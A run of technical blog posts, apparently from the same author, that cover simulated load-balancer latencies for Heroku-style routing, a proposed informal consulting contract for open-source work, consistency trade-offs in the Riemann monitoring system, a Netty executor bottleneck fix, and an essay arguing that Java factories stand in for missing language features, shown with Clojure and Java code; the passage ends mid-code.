We halved our 95th percentile latencies, and cut median request time by roughly a third. RR balancers have a drawback though. Most real-world requests–like the one in our model–take a variable amount of time. When that variability is large enough (relative to pool saturation), round robin balancers can put two long-running requests on the same dyno. Queues back up again.

Least-connections routing

A min-conn LB algorithm keeps track of the number of connections which it has opened on each particular backend. When a new connection arrives, you find the backend with the least number of current connections. For singlethreaded servers, this also corresponds to the server with the shortest queue (in terms of request count, not time).
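The selection rule itself is one line. A sketch (backend names are hypothetical; for singlethreaded backends the connection count doubles as the queue length):

```python
def pick_min_conn(conns):
    """conns maps backend -> open connections; ties broken by name."""
    return min(conns, key=lambda b: (conns[b], b))

conns = {"dyno-1": 3, "dyno-2": 0, "dyno-3": 5}
print(pick_min_conn(conns))   # dyno-2
```

The hard part isn't the rule, it's keeping every balancer's view of those counts accurate and shared.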

(lb-min-conn (dynos 250))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  1.0
Request rate:     1049.7806 reqs/s
Response rate:    1041.1244 reqs/s
Latency distribution:
  Min:     22.0
  Median:  92.0
  95th %:  322.0
  99th %:  483.0
  Max:     974.0

Our 95th percentile latency has gone from 631 ms, to 375 ms, to 322 ms. This algorithm is significantly more efficient over our simulated dynos than random or round-robin balancing–though it's still not optimal. An optimal algorithm would predict the future and figure out how long each request will take before allocating it–so it could avoid stacking two long-running requests in the same queue.

Least-conns also means keeping track of lots of state: a number for every dyno, at least. All that state has to be shared between the load balancers in a given cluster, which can be expensive. On the other hand, we could afford up to a 200-millisecond delay on each connection, and still be more efficient than a random balancer. That's a fair bit of headroom.

Meanwhile, in the real world

Heroku can't use round-robin or min-conns load balancers for their whole infrastructure–it's just too big a problem to coordinate. Moreover, some of the load balancers are far apart from each other so they can't communicate quickly or reliably. Instead, Heroku uses several independent least-conns load balancers for their Bamboo stack. This has a drawback: with two least-conns routers, you can load the same dyno with requests from both routers at once–which increases the queue depth variability.

Let's hook up a random router to a set of min-conns routers, all backed by the same pool of 250 dynos. We'll separate the random routing layer from the min-conns layer by a 5-millisecond-long network cable.

(defn bamboo-test [n]
  (test-node (str "Bamboo with " n " routers")
    (let [dynos (dynos pool-size)]
      (lb-random
        (pool n
          (cable 5
            (lb-min-conn dynos)))))))

(deftest ^:bamboo bamboo-2  (bamboo-test 2))
(deftest ^:bamboo bamboo-4  (bamboo-test 4))
(deftest ^:bamboo bamboo-8  (bamboo-test 8))
(deftest ^:bamboo bamboo-16 (bamboo-test 16))

This plot sums up, in a nutshell, why RapGenius saw terrible response times. Latencies in this model–especially those killer 95th and 99th percentile times–rise linearly with additional least-conns routers (asymptotically bounded by the performance of a random router). As Heroku's Bamboo cluster grew, so did the variability of dyno queue depths.

bamboo.png

This is not the only routing topology available. In part 2, I explore some other options for distributed load balancing. If you want to experiment with Timelike for yourself, check out the github project.

I'm not a big fan of legal documents. I just don't have the resources or ability to reasonably defend myself from a lawsuit; retaining a lawyer for a dozen hours would literally bankrupt me. Even if I were able to defend myself against legal challenge, standard contracts for software consulting are absurd. Here's a section I encounter frequently:

Ownership of Work Product. All Work Product (as defined below) and benefits thereof shall immediately and automatically be the sole and absolute property of Company, and Company shall own all Work Product developed pursuant to this Agreement.

“Work Product” means each invention, modification, discovery, design, development, improvement, process, software program, work of authorship, documentation, formula, data, technique, know-how, secret or intellectual property right whatsoever or any interest therein (whether or not patentable or registrable under copyright or similar statutes or subject to analogous protection) that is made, conceived, discovered, or reduced to practice by Contractor (either alone or with others) and that (i) relates to Company’s business or any customer of or supplier to Company or any of the products or services being developed, manufactured or sold by Company or which may be used in relation therewith, (ii) results from the services performed by Contractor for Company or (iii) results from the use of premises or personal property (whether tangible or intangible) owned, leased or contracted for by Company.

These paragraphs essentially state that any original thoughts I have during the course of the contract are the company's property. If the ideas are defensible under an IP law, I could be sued for using them in another context later. One must constantly weigh the risk of thinking under such a contract. “If I consider this idea now, I run the risk of inventing something important which I can never use again.”

If you're contracted to work on an open-source project, the ramifications are bigger than just your life. Any code you write or data structure you invent is the company's property. You've got to trust that the company will make that code available under the project's license. If they don't do that, you're stuck: you can never implement that idea in the OSS project without running the risk of a lawsuit. Any work you do for the contract is potentially toxic, and must be withheld from the project and all its users, not to mention your future employers.

You'd think IP lawyers would realize this is counter-productive, right? Contracts like this give you huge incentives to ignore the client's problems, to not listen to their ideas, to not think about solutions, because every novel thought carries an unknown risk of being locked away forever.

I prefer informal contracts–an agreement that tries to express the reasonable obligations of two parties to each other in clear, sensible language. It's legally indefensible, I'm sure. I just want to understand my obligation to the company, and express my dedication to that task, my abilities and shortcomings, as well as possible. I also have an obligation to the open-source community–especially Riemann's users–to make improvements widely available. Balancing those takes care.

So here's an example of the sort of agreement I usually propose, instead:

Hello there!

This is a contract between Kyle Kingsbury (I, me), and FooCorp.

Time

I'm going to help you instrument your systems with Riemann. I'll do my
best to be available from 1000 to 1800 Pacific, every weekday, to speak
with FooCorp's engineers, and may be available during other times as
well. We can negotiate together to figure out what schedule makes sense.

FooCorp will probably ask for features, research, documentation, or
other improvements to Riemann. In addition to regular business hours, I
may work on these problems “whenever I feel like it”–nights, weekends,
etc, so long as the FooCorp employee I'm working with approves. I'll do
my best to provide realistic time estimates for any significant
undertaking, and suggest alternatives where sensible.

I'll keep a daily log of the hours I work, and a high-level overview of
what I accomplished each day.

Termination of contract

I'll complete up to 80 hours of work specifically for FooCorp. At any
time, either I or FooCorp may terminate this agreement for any
reason–for instance, if I complete all the work FooCorp asks for, if
my work is unsatisfactory, or if I accept a job offer which prohibits
outside employment. I'll clearly communicate if any circumstances like
this arise, and ask FooCorp to kindly do the same.

If this happens I'll do my best to reach a good stopping point, and
continue supporting FooCorp through Riemann's open-source channels.

Ownership of work

Riemann is an open-source project. Any code, documentation, features,
etc I produce which are suitable for the whole community will be
integrated into Riemann's codebase, published on Github, and licensed
under the EPL. FooCorp may, at their discretion, be thanked in the web
site for their feedback, advice, financial support, etc. “This feature
brought to you by…”, that sort of thing.

Riemann has specific design goals. If FooCorp requests features which
don't make sense for Riemann's design, I may refuse to make those
changes. However, I'll do my best to suggest an alternate design (e.g. a
library or standalone program) and help build that, instead.

Whenever FooCorp requests, I can create works (documentation, software,
etc.) which are not released as a part of the open-source project.
This closed-source work will be delivered to FooCorp and will be their
responsibility to maintain. I assign to FooCorp full ownership of this
closed-source work, and unlimited reproduction rights, distribution
rights, sublicensability, transferability, etc.

Open-source code will likely be easier for FooCorp to maintain, and
will receive community-generated improvements. For instance, I may fix
bugs in open-source features later, and you can take advantage of those
improvements.

Ownership of ideas

I may sign a nondisclosure agreement with FooCorp. Since all of
Riemann's ideas are open-source, there is no risk in disclosing those
ideas to FooCorp. I will not, to the best of my abilities, make use of
or disclose proprietary or secret information from FooCorp in any
context other than our work together.

I may make use of proprietary or secret information to improve the
open-source Riemann, but not in a way which discloses that information.
For instance, I might discover that your company needs to push
information about 2 million users through Riemann, and improve
performance to allow that. I won't disclose that you have 2 million
users–but I will write and release the code to make it possible.

Any unique information, algorithms, data structures, vague notions, etc.
I invent or research during this contract are not FooCorp's property,
and may be disclosed or integrated into my work at any time. For
example, if I realize I can improve performance by reorganizing streams
in a certain way, FooCorp can't sue me if I make that performance
improvement after our contract is over.

No warranty

I make no guarantee as to the correctness, safety, performance, etc of
any works produced, but I'll certainly do my best during the contract.
My goal is to get clean, fast, tested, runnable code into your hands.
FooCorp is welcome to ask for help after our contract ends, through
open-source, personal, or business channels–but I am under no
contractual obligation to fulfill those requests.

In practical terms, if I build something for you, let's test it during
the contract and make sure it works! That way I can fix it if there's
something wrong.

Payment

When our contract is over (due to early termination or at the end of 80
hours), or every 30 days, whichever comes first, I'll email an invoice
to FooCorp for the hours of work completed. FooCorp will mail a check
to Kyle Kingsbury within 30 days of that email receipt.

My hourly rate for this contract is $100/hr.

Thanks for your consideration, and I look forward to working with you!

–Kyle

My contracts are significantly shorter than the standardized consulting contracts I usually see. They also emphasize different things. Typical contracts spend a lot of time concerned with listing rights, which is important because in a legal dispute you need to point to those exact words in the document. Typical contracts, on the other hand, give little guidance about how the relationship should work. I try to emphasize the role of good communication–pointing out places where we might disagree, or where it's important to come to a shared understanding as the relationship evolves. I try to suggest specific hours for my availability, which is something many contracts don't address at all. I also try to give examples to justify the terms I'd like to use–under the hypothesis that if we understand the spirit of the agreement, we're less likely to argue over technicalities.

tl;dr Riemann is a monitoring system, so it emphasizes liveness over safety.

Riemann is aimed at high-throughput (millions of events/sec/node), partial-harvest event processing, where it is acceptable to trade completeness for throughput at low latencies. For instance, it's probably fine to drop half of your request latency events on the floor, if you're calculating a lossy histogram with sampling anyway. It's also typically acceptable to have nondeterministic behavior with respect to time windows: if one node's clock is skewed, it's better to process it “soonish” rather than waiting an unbounded amount of time for it to check in.

There is no synchronization or relationship between events. Events are immutable and have a total order, even though a given server or client may only have a fraction of the relevant events for a system. The events are, in a sense, the transaction log–except that the semantics of those transactions depend on the stream configuration.

Riemann is only trivially distributed: clients send events to servers. Servers can act as clients themselves. The protocol provides synchronous acknowledgement of each received event… which could mean “your write is durably stored on disk” or “I threw your write on a queue, good luck have fun”, or any mixture in between, like “I queued your write for use by a windowing stream, I queued it for submission to Librato metrics, and reacted to the failure condition by sending an email which has been acked by the mail system.”

All of these guarantees are present only for a single server. At some point Riemann will need to be available during partitions.

The “Fuck it, no coordination” model, which I have now, allows for degraded harvest and low latencies for data which it's OK to lose some of. A simple strategy is to carpetbomb every Riemann server in the cluster with your events, with a tunable write-replica threshold. Each server might have a slightly different view of the world, depending on where it was partitioned and for how long.

Stronger consistency

Some events (which happen infrequently) need strong coordination. We need to guarantee, for example, that of three Riemann servers responsible for this datacenter, exactly one sends the “hey, the web server's broken” email. These events require bounded guarantees of both liveness: “Someone must send an email in five seconds” and safety: “I don't care who but one of you better do it”.

I'm pretty sure these constraints on side effects essentially violate CAP, in the face of arbitrary partitions. If a node decides “I'll send it”, sends the email, then explodes just before telling the others “I sent it!”, the remaining nodes have no choice but to send a duplicate message.

In the event of these failure modes (like a total partition), duplicates are preferable to doing nothing. Waaay better to page someone twice than to risk not paging them at all.

However, there are some failure modes where I can provide delivered-once guarantees of side effects. For example, up to floor(n/2) node failures, or a partition which leaves a fully-connected quorum. In these circumstances, 2PC or Paxos can give me strong consistency guarantees, and I can detect (in many cases, I think) the failure modes which would result in sacrificing consistency and requiring a duplicate write. A Riemann server can call someone and say,

“Hey, I just paged you, and this is crazy, but I've got split brain, I'll call twice maybe.”

Since events are values, I can serialize and compare them. That means you might actually be able to write, in the streams config, an expression which means “attempt to ensure these events are processed on exactly one host in the cluster.”

(streams
  (where (state "critical")
    ; This is unsynchronized and proceeds on all nodes concurrently
    #(prn "Uh oh, this thing's broken!" %)

    (master
      ; Any events inside master are executed on exactly one node if
      ; quorum is preserved, or maybe multiple hosts if a node fails before
      ; acking.
      (email "aphyr@aphyr.com"))))

…which is most useful when clients can reach a majority of servers (and lets clients know whether or not their event was accepted). I can also provide a weaker guarantee along the lines of “Try to prevent all connected peers from sending this event within this time window,” which is useful for scenarios where you want to know about errors which occurred in minority partitions and it's likely that clients will be partitioned with their servers; e.g. one Riemann per agg switch or DC.

This doesn't guarantee all nodes have the same picture of the world which led up to that failure. I think doing that would require full coordination between all nodes about the event stream (and its ordering), which would impose nontrivial synchronization costs. Explicit causal consistency could improve this, but we'd need a way to express and compute those causal relationships between arbitrary stream functions somehow.

Realistically, this may not be a problem. When Riemann sees a quorum loss it can wake someone up, and when the partition is resolved nodes will converge rapidly on “hey, that service still isn't checking in.”

A third path

What I don't know yet is whether there's a role for events which don't need the insane overhead of 2PC or Paxos for every… single… event… but do need some kind of distributed consistency. HAT (Highly Available Transactions) is interesting because it provides reasonably strong consistency guarantees for an AP system, but at the cost of liveness. Is that liveness tradeoff suitable for Riemann, where responding Right Now is critical? Probably not. But it might be useful for historical stores, or expressing distributed multi-event transactions–which currently don't exist. I don't even know what this would mean in an event-oriented context.

Why? Riemann's event model treats events as values. Well-behaved clients provide a total order and identity over events based on their host, service, and timestamps. This means reconstructing any linear subset of the event stream can be done in an eventually consistent way. If Riemann were to become a historical store, reconciling divergent histories would simply be the set union of all received events.
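To make the identity-and-union idea concrete, here's a hypothetical Java sketch. The Event record and reconcile function are invented for illustration; Riemann's actual event type carries more fields, but the point is that identical events collapse under set union, so merging needs no coordination.

```java
import java.util.HashSet;
import java.util.Set;

class Merge {
    // Identity is (host, service, time); records compare by components.
    record Event(String host, String service, long time, double metric) {}

    static Set<Event> reconcile(Set<Event> a, Set<Event> b) {
        Set<Event> merged = new HashSet<>(a);
        merged.addAll(b);  // duplicates collapse; order doesn't matter
        return merged;
    }

    public static void main(String[] args) {
        Event e1 = new Event("web1", "req rate", 100, 5.0);
        Event e2 = new Event("web2", "req rate", 100, 7.0);
        // Both partitions saw e1; only one saw e2.
        Set<Event> merged = reconcile(Set.of(e1), Set.of(e1, e2));
        System.out.println(merged.size()); // prints 2
    }
}
```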

Except for derived events. What happens when a partition separates two Riemann servers measuring request throughput? Each receives half of the events it used to, and their rate streams start emitting events with a metric half as big as they used to. If both Riemann servers are logging these events to a historical store, the store will show only half the throughput it used to.

One option is to log only raw events and reconstruct derived events by replaying the merged event log. What was the rate at noon? Apply all the events from 11:55 to 12:00 to the rate stream and see.
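A sketch of that replay idea, assuming a hypothetical rate function over raw event timestamps (real derived streams are richer, but the shape is the same: derived values are a pure function of the merged raw log).

```java
import java.util.List;

class Replay {
    // Rate = events per second over [start, end), replayed from the raw log.
    static double rateAt(List<Long> eventTimes, long start, long end) {
        long count = eventTimes.stream()
                               .filter(t -> t >= start && t < end)
                               .count();
        return (double) count / (end - start);
    }

    public static void main(String[] args) {
        // Union of both partitions' raw logs, including a duplicate-free merge.
        List<Long> merged = List.of(100L, 101L, 101L, 103L, 104L);
        System.out.println(rateAt(merged, 100, 105)); // prints 1.0
    }
}
```

Because the raw log merges cleanly, the derived rate is correct after partitions heal, even though each side's live rate stream was wrong during the partition.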

Another option might be for rate streams themselves to be transactional in nature, but I'm not sure how to do that in a way which preserves liveness guarantees.

I've been doing a lot of performance tuning in Riemann recently, especially in the clients–but I'd like to share a particularly spectacular improvement from yesterday.

The Riemann protocol

Riemann's TCP protocol is really simple. Send a Msg to the server, receive a response Msg. Messages might include some new events for the server, or a query; and a response might include a boolean acknowledgement or a list of events matching the query. The protocol is ordered; messages on a connection are processed in-order and responses sent in-order. Each Msg is serialized using Protocol Buffers. To figure out how large each message is, you read a four-byte length header, then read length bytes, and parse that as a Msg.

time --->
send: [length1][msg1] [length2][msg2]
recv:          [length1][msg1] [length2][msg2]
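Here's a minimal Java sketch of that framing scheme. The writeFrame/readFrame names are hypothetical, and a real client would parse the payload as a protobuf Msg rather than returning raw bytes; the framing itself (4-byte big-endian length, then that many bytes) is as described above.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;

class Framing {
    static void writeFrame(DataOutputStream out, byte[] msg) throws IOException {
        out.writeInt(msg.length);  // 4-byte big-endian length header
        out.write(msg);            // then the Msg bytes
    }

    static byte[] readFrame(DataInputStream in) throws IOException {
        int length = in.readInt();  // read the header...
        byte[] msg = new byte[length];
        in.readFully(msg);          // ...then exactly `length` bytes
        return msg;
    }

    public static void main(String[] args) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        writeFrame(new DataOutputStream(buf),
                   "hello".getBytes(StandardCharsets.UTF_8));
        byte[] round = readFrame(
            new DataInputStream(new ByteArrayInputStream(buf.toByteArray())));
        System.out.println(new String(round, StandardCharsets.UTF_8)); // prints hello
    }
}
```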

The optimization I discussed last time–pipelining requests–allows a client to send multiple messages before receiving their acknowledgements. There are many queues in between a client saying “send a message” and that message actually being parsed in Riemann: Java IO buffers, the kernel TCP stack, the network card, various pieces of networking hardware, the wires themselves… all act like queues. This means throughput is often limited by latency, so by writing messages asynchronously we can achieve higher throughput with only minor latency costs.

The other optimization I've been working on is batching. For various reasons, this kind of protocol performs better when messages are larger. If you can pack 100 events into a message, the server can buffer and parse it in one go, resulting in much higher throughputs at the cost of significantly higher latencies–especially if your event needs to sit in a buffer for a while, waiting for other events to show up so they can be sent in a Msg.
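A hedged sketch of such a batching buffer in Java. The Batcher class is hypothetical; a real client would also flush on a timer, so a lone event doesn't sit in the buffer indefinitely waiting for company.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;

class Batcher<T> {
    private final int batchSize;
    private final Consumer<List<T>> sender;
    private final List<T> buffer = new ArrayList<>();

    Batcher(int batchSize, Consumer<List<T>> sender) {
        this.batchSize = batchSize;
        this.sender = sender;
    }

    synchronized void add(T event) {
        buffer.add(event);
        if (buffer.size() >= batchSize) {          // send one big Msg
            sender.accept(new ArrayList<>(buffer)); // instead of many small ones
            buffer.clear();
        }
    }

    public static void main(String[] args) {
        List<Integer> sentBatches = new ArrayList<>();
        Batcher<String> b = new Batcher<>(3, batch -> sentBatches.add(batch.size()));
        for (int i = 0; i < 7; i++) b.add("event-" + i);
        System.out.println(sentBatches); // prints [3, 3]; one event still buffered
    }
}
```

The seventh event illustrates the latency cost: it waits in the buffer until two more events (or, in a real client, a flush timer) arrive.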

Netty's threadpools

For any given connection, Netty (as used in Riemann) has two threadpools handling incoming bytes: the IO worker pool, and a handler pool which actually handles Riemann events. The IO worker pool is busy shuttling bytes back and forth from the TCP connection buffers through the pipeline–but if an IO worker spends too much time on a single channel, it won't be able to handle other channels and latencies will rise. An ExecutionHandler takes over at some point in the pipeline, which uses the handler pool to do long-running work like handling a Msg.

Earlier versions of Riemann put the ExecutionHandler very close to the end of the pipeline, because all the early operations in the pipeline are really fast. The common advice goes, “Wrap long-running tasks in an execution handler, so they don't block”. OK, makes sense.

(channel-pipeline-factory
           int32-frame-decoder (int32-frame-decoder) ; Read off 32-bit length headers
  ^:shared int32-frame-encoder (int32-frame-encoder) ; Add length header on the way out
  ^:shared protobuf-decoder    (protobuf-decoder)    ; Decode bytes to a Msg
  ^:shared protobuf-encoder    (protobuf-encoder)    ; Encode a Msg to bytes
  ^:shared msg-decoder         (msg-decoder)         ; Convert Msg to a record
  ^:shared msg-encoder         (msg-encoder)         ; Convert a record to a Msg
  ^:shared executor            (execution-handler)   ; Switch to handler threadpool
  ^:shared handler             (gen-tcp-handler      ; Actually process the Msg
                                 core channel-group tcp-handler))

Now… a motivated or prescient reader might ask, “How, exactly, does the execution handler get data from an IO thread over to a handler thread?”

It puts it on a queue. Like every good queue it's bounded–but not by number of items, since some items could be way bigger than others. It's bounded by memory.

(defn execution-handler
  "Creates a new netty execution handler."
  []
  (ExecutionHandler.
    (OrderedMemoryAwareThreadPoolExecutor.
      16        ; Core pool size
      1048576   ; 1MB per channel queued
      10485760  ; 10MB total queued
      )))
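To illustrate what “bounded by memory” means, here's a simplified, hypothetical Java queue that bounds total queued bytes rather than item count. Netty's executor also tracks per-channel limits and estimates object sizes instead of blocking like this; this sketch sidesteps estimation entirely by queueing raw buffers whose size is known.

```java
import java.util.ArrayDeque;

class MemoryBoundedQueue {
    private final long maxBytes;
    private long queuedBytes = 0;
    private final ArrayDeque<byte[]> items = new ArrayDeque<>();

    MemoryBoundedQueue(long maxBytes) { this.maxBytes = maxBytes; }

    synchronized void put(byte[] item) throws InterruptedException {
        while (queuedBytes + item.length > maxBytes) wait(); // backpressure
        items.add(item);
        queuedBytes += item.length; // size is exact: it's just a byte buffer
        notifyAll();
    }

    synchronized byte[] take() throws InterruptedException {
        while (items.isEmpty()) wait();
        byte[] item = items.poll();
        queuedBytes -= item.length;
        notifyAll(); // wake blocked producers
        return item;
    }

    public static void main(String[] args) throws InterruptedException {
        MemoryBoundedQueue q = new MemoryBoundedQueue(1024);
        q.put(new byte[100]);
        System.out.println(q.take().length); // prints 100
    }
}
```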

How does the Executor know how much memory is in a given item? It uses a DefaultObjectSizeEstimator, which knows all about Bytes and Channels and Buffers… but absolutely nothing about the decoded Protobuf objects which it's being asked to enqueue. So the estimator goes and digs into the item's fields using reflection:

int answer = 8; // Basic overhead.
for (Class<?> c = clazz; c != null; c = c.getSuperclass()) {
    Field[] fields = c.getDeclaredFields();
    for (Field f : fields) {
        if ((f.getModifiers() & Modifier.STATIC) != 0) {
            // Ignore static fields.
            continue;
        }
        answer += estimateSize(f.getType(), visitedClasses);

Of course, I didn't know this at the time. Netty is pretty big, and despite extensive documentation it's not necessarily clear that an OrderedMemoryAwareThreadPoolExecutor is going to try and guess how much memory is in a given object, recursively.

So I'm staring at Yourkit, completely ignorant of everything I've just explained, and wondering why the devil DefaultObjectSizeEstimator is taking 38% of Riemann's CPU time. It takes me ~15 hours of digging through Javadoc and source and blogs and StackOverflow to realize that all I have to do is…

  1. Build my own ObjectSizeEstimator, or
  2. Enqueue things I already know the size of.
(channel-pipeline-factory
           int32-frame-decoder (int32-frame-decoder)
  ^:shared int32-frame-encoder (int32-frame-encoder)
  ^:shared executor            (execution-handler) ; <--+
  ^:shared protobuf-decoder    (protobuf-decoder)  ;    |
  ^:shared protobuf-encoder    (protobuf-encoder)  ;    |
  ^:shared msg-decoder         (msg-decoder)       ;    |
  ^:shared msg-encoder         (msg-encoder)       ; ___|
  ^:shared handler             (gen-tcp-handler
                                 core channel-group tcp-handler))

Just move one line. Now I enqueue buffers with known sizes, instead of complex Protobuf objects. DefaultObjectSizeEstimator runs in constant time. Throughput doubles. Minimum latency drops by a factor of two.

[Image: drop tcp event batch throughput.png]

[Image: drop tcp event batch latency.png]

Throughput here is measured in messages, each containing 100 events, so master is processing 200,000–215,000 events/sec. Latency is for synchronous calls to client.sendEvents(anEvent). The dropoff at the tail end of the time series is the pipelining client draining its message queue. Client and server are running on the same quad-core Q8300, pushing about 20 megabytes/sec of traffic over loopback. Here's what the riemann-bench session looks like, if you're curious.

Why didn't you figure this out sooner?

I wrote most of this code, and what code I didn't write, I reviewed and tested. Why did it take me so long to figure out what was going on?

When I started working on this problem, the code looked nothing like the pipeline I showed you earlier.

The Netty pipeline evolved piecemeal, by trial-and-error, and went through several refactorings. The UDP server, TCP server, and Graphite server share much of the same code, but do very different things. I made several changes to improve performance. In making these changes I tried to minimize API disruption–to keep function interfaces the same–which gradually pulled the pipeline into several interacting pieces. Netty's API is well-written, flexible Java code–which means it comes with literally hundreds of names to keep track of. Keeping function and variable names distinct became a challenge.

By the time I started digging into the problem, I was hard pressed to figure out what a channel pipeline factory was, let alone how it was constructed.

In order to solve the bug I had to understand the code, which meant inventing a new language to talk about pipelines. Once I'd expressed the pipeline clearly, it was obvious how the pieces interacted. Experimenting with new pipelines took a half hour, and I was able to almost double throughput with a single-line change.

I've had two observations floating around in my head, looking for a way to connect with each other.

Many “architecture patterns” are scar tissue around the absence of higher-level language features.

and a criterion for choosing languages and designing APIs

Write down the simplest syntactically valid expression of what you want to do. That expression should be a program.

First, let me clarify that there are all sorts of wonderful patterns in software–things like “functions”, “iteration”, “monads”, “concurrent execution”, “laziness”, “memoization”, and “parametric polymorphism”. Sometimes, though, we write the same combination of symbols over and over again, in a nontrivial way. Maybe it takes ten or twenty lines to encapsulate an idea, and you have to type those lines every time you want to use the idea, because the language cannot express it directly. It's not that the underlying concept is wrong–it's that the expression of it in a particular domain is unwieldy, and has taken on a life of its own. Things like Builders and, in this post, Factories.

Every language emphasizes some of these ideas. Erlang, for instance, emphasizes concurrency, and makes it easy to write concurrent code by introducing special syntax for actors and sending messages. Ruby considers lexical closures important, and so it has special syntax for writing blocks concisely. However, languages must balance the expressiveness of special syntax against the complexity that syntax introduces. Scala, for instance, includes special syntactic rules for a broad variety of constructs (XML literals, lexical closures, keyword arguments, implicit scope, variable declaration, types)—and often several syntaxes for the same construct (method invocation, arguments, code blocks). When there are many syntax rules, understanding how those rules interact with each other can be difficult.

I argue that defining new syntax should be a language feature: one of Lisp's strengths is that its syntax is both highly regular and semantically fluid. Variable definition, iteration, concurrency, and even evaluation rules themselves can be defined as libraries—in a controlled, predictable way. In this article, I'd like to give some pragmatic examples as to why I think this way.

Netty

There's a Java library called Netty, which helps you write network servers. In Netty each connection is called a channel, and bytes which come from the network flow through a pipeline of handlers. Each handler transforms incoming messages in some way, and typically forwards a different kind of message to the next handler down the pipeline.

Now, some handlers are safe to re-use across different channels–perhaps because they don't store any mutable state. For instance, it's OK to use a ProtobufDecoder to decode several Protocol Buffer messages at the same time. It's not safe, however, to use a LengthFieldBasedFrameDecoder to decode two channels at once, because this kind of decoder reads a length header, then saves that state and uses it to figure out how many more bytes it needs to accept from that channel. We need a new LengthFieldBasedFrameDecoder every time we accept a new connection.

In languages which have first-class functions, the easiest way to get a new, say, Pipeline is to write down a function which makes a new Pipeline, and then call it whenever you need one. Here's one for Riemann.

(fn []
  (doto (Channels/pipeline)
    (.addLast "integer-header-decoder"
              (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4))
    (.addLast "protobuf-decoder"
              (ProtobufDecoder. (Proto$Msg/getDefaultInstance)))))

Doto is an example of redefinable syntax. It's a macro—a function which rewrites code at compile time. Doto transforms code like (doto obj (function1 arg1) (function2)) into (let [x obj] (function1 x arg1) (function2 x) x), where x is a unique variable which will not conflict with the surrounding scope. In short, it simplifies a common pattern: performing a series of operations on the same object, but eliminates the need to explicitly name the object with a variable, or to write the variable in each expression.

Every time you call this function, it creates a new pipeline (with Channels.pipeline()), and adds a new LengthFieldBasedFrameDecoder to it, then adds a new protobuf decoder to it, then returns the pipeline.

Java doesn't have first-class functions. It has something called Callable, a parameterizable interface for zero-arity functions–but since there are no arguments, you're stuck writing a new class and explicitly closing over the variables you need every time you want a function. Java works around these gaps by creating a new class for every function it might need, and giving that class a single method. These classes are called “Factories”. Netty has a factory specifically for generating pipelines, so to build new Pipelines, you have to write a new class.

public class RiemannTcpChannelPipelineFactory implements ChannelPipelineFactory {
  public ChannelPipeline getPipeline() throws Exception {
    ChannelPipeline p = Channels.pipeline();
    p.addLast("integer-header-decoder",
              new LengthFieldBasedFrameDecoder(Integer.MAX_VALUE, 0, 4, 0, 4));
    p.addLast("protobuf-decoder",
              new ProtobufDecoder(Proto.Msg.getDefaultInstance()));
    return p;
  }
}

new RiemannTcpChannelPipelineFactory()

The class (and the interface it implements) are basically irrelevant–this class only has one method, and its type is inferrable. This is a first-class function, in Java. We can shorten it a bit by writing an anonymous class:

new ChannelPipelineFactory() {
  public ChannelPipeline getPipeline() throws Exception {

… which saves us from having to name our factory, but we still have to talk about ChannelPipelineFactory, remember its method signature and constructor, etc–and the implementer still needs to write a class or interface.

Since Netty expects a ChannelPipelineFactory, we can't just feed it a Clojure function. Instead, we can use (reify) to create a new instance of a dynamically compiled class which implements any number of interfaces, and has final local variables closed over from the local environment. So if we wanted to reuse the same protobuf decoder in every pipeline…

(let [pb (ProtobufDecoder. (Proto$Msg/getDefaultInstance))]
  (reify ChannelPipelineFactory
    (getPipeline [this]
      (doto (Channels/pipeline)
        (.addLast "integer-header-decoder"
                  (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4))
        (.addLast "protobuf-decoder" pb)))))

In Java, you'd create a new class variable, like so. Note that if you wanted to change pb you'd have to write some plumbing functions–getters, setters, constructors, or whatever, or use an anonymous class and close over a reference object.

public class RiemannTcpChannelPipelineFactory {
  final ProtobufDecoder pb = new ProtobufDecoder(Proto.Msg.getDefaultInstance());
  ...

Now… these two create basically identical objects. Same logical flow. But notice what's missing in the Clojure code.

There's no name for the factory. We don't need one because it's a meaningless object–its sole purpose is to act like a partially applied function. It disappears into the bowels of Netty and we never think of it again. This is an entire object we didn't have to think up a name for, ensure that its name and constructor are consistent with the rest of the codebase, create a new file to put it in, and add that file to source control. The architecture pattern of “Factory”, and its associated single-serving packets of one verb each, has disappeared.

(let [adder (partial + 1 2)]
  (adder 3 4)) ; => 1 + 2 + 3 + 4 = 10

public class AdderFactory {
  public final int addend1;
  public final int addend2;
  ...
  public AdderFactory(final int addend1) {
    this.addend1 = addend1;
  }
  public AdderFactory(final int addend1, final int addend2) {
    this.addend1 = addend1;
    this.addend2 = addend2;
  }
  ...
  public int add(final int anotherAddend1, final int anotherAddend2) {
    return addend1 + addend2 + anotherAddend1 + anotherAddend2;
  }
}

AdderFactory adder = new AdderFactory(1, 2);
adder.add(3, 4);

Factories are just awkward ways to express partial functions.
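To see this, here's the AdderFactory collapsed into a closure using Java 8 lambdas (which arrived after this Factory pattern took hold; the adder name is hypothetical). The constructor arguments become captured variables; the factory object disappears.

```java
import java.util.function.IntBinaryOperator;

class Partial {
    // Partially apply the first two addends of a 4-ary addition.
    static IntBinaryOperator adder(int a, int b) {
        return (x, y) -> a + b + x + y; // closes over a and b
    }

    public static void main(String[] args) {
        System.out.println(adder(1, 2).applyAsInt(3, 4)); // prints 10
    }
}
```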

Back to Netty.

So far we've talked about a single ChannelPipelineFactory. What happens if you want to make more than one? Riemann has at least three–and I don't want to write down three classes for three almost-identical pipelines. I just want to write down their names, and the handlers themselves, and have a function take care of the rest of the plumbing.

Enter our sinister friend, the macro, stage left:

(defmacro channel-pipeline-factory
  "Constructs an instance of a Netty ChannelPipelineFactory from a list of
  names and expressions which evaluate to handlers. Names with metadata
  :shared are evaluated once and re-used in every invocation of
  getPipeline(), other handlers will be evaluated each time.

  (channel-pipeline-factory
             frame-decoder    (make-an-int32-frame-decoder)
    ^:shared protobuf-decoder (ProtobufDecoder. (Proto$Msg/getDefaultInstance))
    ^:shared msg-decoder      msg-decoder)"
  [& names-and-exprs]
  (assert (even? (count names-and-exprs)))
  (let [handlers (partition 2 names-and-exprs)
        shared   (filter (comp :shared meta first) handlers)
        forms    (map (fn [[h-name h-expr]]
                        `(.addLast ~(str h-name)
                                   ~(if (:shared (meta h-name))
                                      h-name
                                      h-expr)))
                      handlers)]
    `(let [~@(apply concat shared)]
       (reify ChannelPipelineFactory
         (getPipeline [this]
